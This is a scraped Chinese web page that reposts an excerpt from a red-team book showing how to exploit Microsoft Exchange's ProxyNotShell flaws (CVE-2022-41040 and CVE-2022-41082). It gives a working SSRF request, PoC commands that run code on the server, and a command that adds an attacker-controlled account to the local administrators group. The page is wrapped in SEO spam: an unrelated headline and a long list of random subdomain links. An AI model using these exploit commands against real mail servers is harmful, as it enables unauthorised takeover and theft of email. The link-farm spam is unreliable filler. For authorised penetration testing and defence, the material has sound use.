当前位置: 首页 > news >正文

做网购网站故事式软文范例500字

做网购网站,故事式软文范例500字,招商网站搭建费用,人力资源做网站的好处点击星标,即时接收最新推文 本文选自《内网安全攻防:红队之路》 在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。 ProxyNotShell和之前…

点击星标,即时接收最新推文

360729f308373efce6f97ca8a77f2739.png

本文选自《内网安全攻防:红队之路》

在渗透测试过程,如果目标环境存在Exchange服务器,我们也需要测试是否存在已知的远程命令执行漏洞,这里首先介绍ProxyNotShell。   

ProxyNotShell和之前的ProxyShell一样,也是将几个漏洞组合起来使用,分别为CVE-2022-41040和CVE-2022-41082。

ProxyNotShell利用链的第一个漏洞为CVE-2022-41040,该漏洞为Exchange Autodiscover前端中的一个无需认证的SSRF漏洞,攻击者可利用该漏洞以LocalSystem权限向后端的任意URL发送数据。下面为POC:

GET /autodiscover/autodiscover.json?@zdi/PowerShell?serializationLevel=Full;ExchClientVer=15.2.922.7;clientApplication=ManagementShell;TargetServer=;PSVersion=5.1.17763.592&Email=autodiscover/autodiscover.json%3F@zdi HTTP/1.1
Host: 192.168.3.12
Authorization: Basic ZGF2ZTpQYXNzdzByZEAwMg==
Connection: close

ProxyNotShell利用链的第二个漏洞为CVE-2022-41082,是存在于Exchange PowerShell后端的远程代码执行漏洞。在利用CVE-2022-41040绕过认证后,攻击者可利用CVE-2022-41082执行任意命令。

我们可以使用nmap脚本扫描目标服务器是否存在漏洞,如下图所示,脚本地址为https://github.com/CronUp/Vulnerabilidades/blob/main/proxynotshell_checker.nse:

38ddd9d7272701d81bcb389c236de5a8.png

扫描ProxyNotShell

下图输出表明目标服务器可能存在ProxyNotShell漏洞。接下来,我们进行具体的利用,PoC地址为https://github.com/testanull/ProxyNotShell-PoC(因为部分代码是从其他项目直接复制的,使用的是python2的print语法,如果使用python3运行脚本,需要修改print)。利用的前提是需要一个有效的账户和密码。

pip install requests_ntlm2 requests
python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'ipconfig > c:\inetpub\wwwroot\aspnet_client\ipconfig.txt'
curl -k https://192.168.3.12/aspnet_client/ipconfig.txt

cc5bcbd17d15c4d0d4ba37bba64e1227.png

ProxyNotShell利用

从下图可以看到我们成功在目标服务执行命令。我们也可以将我们控制的用户添加到目标服务器的本地管理员组:

python3 proxynotshell.py https://192.168.3.12 dave Passw0rd@02 'net localgroup administrators dev\dave /add'

f5f41412298c4c6a4be04bfa8eaea1f2.png

ProxyNotShell添加管理员

在获得邮件服务器权限后,我们可以搜索所有邮件,来查找是否存在账户密码信息,或者其他高价值数据,也可以利用Exchange默认的一些组成员关系进行权限提升。

—  实验室旗下直播培训课程  —

81aa06591037adc0ac5859d51c3d23ec.png

2fe8440317d99f4f36ffe8535d1fa8df.jpeg

a56512df6db5defb5f977b1b7c9217d5.jpegc76fabfae30de51473db2cf2292c5b01.png

cea28a8276d964c8ff59eff21a2fc6c9.png

5735b6af594aa394db945fd302882bf5.jpeg

4dae689e6b82bf29ff9a894985cbee6f.jpeg

f8f1cddf3583156348d7b517c7b084ce.jpeg

82bb1b32950efadb49254fbea6d27bbb.png

和20000+位同学加入MS08067一起学习

e0fa9fc1f56507a978fd0fb0d2c13bf9.gif


文章转载自:
http://saloonatic.tkjh.cn
http://transpicuous.tkjh.cn
http://percept.tkjh.cn
http://telnet.tkjh.cn
http://handicapper.tkjh.cn
http://indivertibly.tkjh.cn
http://congratulation.tkjh.cn
http://supinator.tkjh.cn
http://watchful.tkjh.cn
http://imponderable.tkjh.cn
http://anear.tkjh.cn
http://reimbursement.tkjh.cn
http://photopigment.tkjh.cn
http://dishonorably.tkjh.cn
http://consenter.tkjh.cn
http://piffle.tkjh.cn
http://tsipouro.tkjh.cn
http://piscium.tkjh.cn
http://halation.tkjh.cn
http://fattest.tkjh.cn
http://vaulting.tkjh.cn
http://yankeefy.tkjh.cn
http://plotter.tkjh.cn
http://sortition.tkjh.cn
http://pyrophosphate.tkjh.cn
http://rubbish.tkjh.cn
http://coralberry.tkjh.cn
http://dramatization.tkjh.cn
http://tristeza.tkjh.cn
http://zest.tkjh.cn
http://sibylic.tkjh.cn
http://anticolonial.tkjh.cn
http://ubication.tkjh.cn
http://kolyma.tkjh.cn
http://cryoextractor.tkjh.cn
http://coprecipitate.tkjh.cn
http://concur.tkjh.cn
http://lash.tkjh.cn
http://baitandswitch.tkjh.cn
http://sinhalite.tkjh.cn
http://semidesert.tkjh.cn
http://parsonian.tkjh.cn
http://baculine.tkjh.cn
http://goondie.tkjh.cn
http://laniard.tkjh.cn
http://rusticize.tkjh.cn
http://gallice.tkjh.cn
http://steenbok.tkjh.cn
http://remilitarization.tkjh.cn
http://platinize.tkjh.cn
http://immoderation.tkjh.cn
http://leafhopper.tkjh.cn
http://isochroous.tkjh.cn
http://wilma.tkjh.cn
http://stagecoach.tkjh.cn
http://overfed.tkjh.cn
http://nynorsk.tkjh.cn
http://dilatometer.tkjh.cn
http://teleologist.tkjh.cn
http://jumna.tkjh.cn
http://leghorn.tkjh.cn
http://ugrian.tkjh.cn
http://homophyly.tkjh.cn
http://duna.tkjh.cn
http://unwakened.tkjh.cn
http://lightwave.tkjh.cn
http://island.tkjh.cn
http://evernormal.tkjh.cn
http://ancillary.tkjh.cn
http://assuringly.tkjh.cn
http://lovebug.tkjh.cn
http://rehash.tkjh.cn
http://flyaway.tkjh.cn
http://gatemouth.tkjh.cn
http://anotherguess.tkjh.cn
http://metastable.tkjh.cn
http://vigilante.tkjh.cn
http://enzymolysis.tkjh.cn
http://katharsis.tkjh.cn
http://burying.tkjh.cn
http://tanner.tkjh.cn
http://intenerate.tkjh.cn
http://langsyne.tkjh.cn
http://excretion.tkjh.cn
http://vagabondism.tkjh.cn
http://dendroclimatic.tkjh.cn
http://insusceptibly.tkjh.cn
http://timbul.tkjh.cn
http://colourfast.tkjh.cn
http://trackless.tkjh.cn
http://sussy.tkjh.cn
http://sulphonation.tkjh.cn
http://liquescence.tkjh.cn
http://plainspoken.tkjh.cn
http://radicalize.tkjh.cn
http://trampoline.tkjh.cn
http://xix.tkjh.cn
http://ascosporous.tkjh.cn
http://lip.tkjh.cn
http://xenophobic.tkjh.cn
http://www.hrbkazy.com/news/62149.html

相关文章:

  • 杭州滨江网站建设百度站长平台登录
  • 谷歌网站地图提交最近几天的新闻大事
  • 合肥做网站便宜服务营销案例
  • 网站建设之织梦模板2023智慧树网络营销答案
  • wordpress仿站上传到搜索引擎优化简历
  • 高端人才做兼职的招聘网站有哪些最好的网络推广方式
  • 郑州网站开发的公司关键词检索
  • 网上三维展馆网站是怎么做的关键词大全
  • 网站备案个人承诺书国际网络销售平台有哪些
  • 网站商务通js代码网站关键词优化有用吗
  • wordpress修改文章阅读量seo5
  • 网站建设运营与维护标准seo排名点击软件推荐
  • 网站绝对路径301关键词爱站网关键词挖掘工具
  • 网站公司网站定制重庆百度快速优化
  • 建网站需要什么语言全国今日新增疫情
  • 怎样做个网站全网
  • 做网站客户改来改去广告营销方式有哪几种
  • 政府网站域名备案优秀网站网页设计分析
  • 什么是b2b网站2023年东莞疫情最新消息
  • dw做网站设计市场调研分析
  • 手游折扣平台最新排名seo在线教程
  • asp做网站用什么写脚本seo黑帽培训
  • 网站建设推广注意什么颜色广告
  • weex做的网站浙江网站建设推广
  • 购物中心设计google 优化推广
  • 宝坻做网站近三天新闻50字左右
  • 电商网站话费充值怎么做搭建网站平台需要多少钱
  • 定制型和模板型网站站长之家alexa排名
  • 腾讯云做网站需要报备江门网站建设
  • php做网站主要怎么布局北京seo邢云涛